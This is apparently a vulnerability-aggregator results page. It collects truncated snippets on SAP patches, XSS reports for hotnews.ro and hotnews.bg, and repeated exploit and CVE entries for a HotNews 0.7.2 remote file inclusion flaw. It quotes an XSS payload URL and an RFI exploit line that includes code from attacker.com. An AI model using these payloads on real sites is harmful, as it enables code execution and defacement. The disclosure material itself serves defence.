SAP Kicks Log4Shell Vulnerability Out of 20 Apps

SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Java-based logging library that’s been under active attack since last week. As of yesterday, Patch Tuesday, the German software maker reported that it’s already patched 20 of those apps...

Vulnerabilities fixed in SAP products

Vulnerabilities have been fixed in SAP products. The vulnerabilities enable a malicious person to launch attacks that lead to the following categories of damage: Cross-Site Scripting XSS Denial-of-Service DoS. Circumvention of security measure. Remote code execution User rights Access to system...

SAP Patches Nine Critical & High-Severity Bugs

SAP has released 19 new and updated security patches, three of them rated as “HotNews” critical and six as high-priority. “HotNews” is the severity rating that SAP gives to critical vulnerabilities. Two of this month’s sizzlers have a CVSS score of 9.9 and affect SAP Business One and SAP NetWeave...

hotnews.ro XSS vulnerability

Open Bug Bounty ID: OBB-452158 Description| Value ---|--- Affected Website:| hotnews.ro Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Cheat Sheet...

hotnews.bg XSS vulnerability

Vulnerable URL: http://www.hotnews.bg/search/%22%3E%3Csvg%20onload=alert%22OPENBUGBOUNTY%22%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 06.12.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 55115 VIP website status:| No...

HotNews 0.x hotnews-engine.inc.php3 config[header] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the contex...

HotNews 0.x config[incdir] Parameter Remote File Inclusion

No description provided by source...

HotNews 0.7.2 - Remote File Inclusion

No description provided by source. ================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == ==...

HotNews 0.7.2 Remote File Inclusion

================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@...

HotNews 0.7.2 Remote File Inclusion Vulnerability

No description provided by source. HotNews 0.7.2 Remote File Inclusion Vulnerability Bugs Found by teamelite | http://manadocoding.net | http://www.gcc.web.id/ | Exploit: - http://target/path/includes/hnmain.inc.php3?configincdir=attacker.com/cmd.gif??? ||| ||| ||| ||| Greetz and Thanks to: All...

HotNews 0.7.2 Remote File Inclusion

Exploit for php platform in category web applications =================================== HotNews 0.7.2 Remote File Inclusion =================================== ================================================================================================...

HotNews 0.7.2 - Remote File Inclusion

HotNews 0.7.2 - Remote File Inclusion ================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == ...

HotNews 0.7.2 - Remote File Inclusion

================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@...

CVE-2004-1796

CVE-2004-1796 concerns a PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier. The flaw allows an attacker to execute arbitrary PHP code by supplying manipulated values to either the config[header] parameter in hotnews-engine.inc.php3 or the config[incdir] parameter in hnmain.inc....

CVE-2004-1796

PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the 1 configheader parameter to hotnews-engine.inc.php3 or 2 configincdir parameter to hnmain.inc.php3...

CVE-2004-1796

PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the 1 configheader parameter to hotnews-engine.inc.php3 or 2 configincdir parameter to hnmain.inc.php3...

HotNews arbitary file inclusion

HotNews arbitary file inclusion. ===+++===+++===+++ Product: HotNews Version: = v0.7.2 Vendor: http://sourceforge.net/projects/hotnews/ Bug discovered by: Officerrr [email protected] Vendor Response: Not contacted yet. ===+++===+++===+++ Problem 1: ===+++===+++===+++ Attacker can include a...

HotNews 0.x - config[incdir] Remote File Inclusion

HotNews 0.x - configincdir Remote File Inclusion source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently execute...

HotNews Multiple Script Remote File Inclusion

The remote host is running HotNews, a set of PHP scripts designed to set up a newssystem for web pages. It is possible this suite to make the remote host include php files hosted on a third-party server. An attacker may use this flaw to inject arbitrary code in the remote host and gain a shell wi...

HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion

source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the...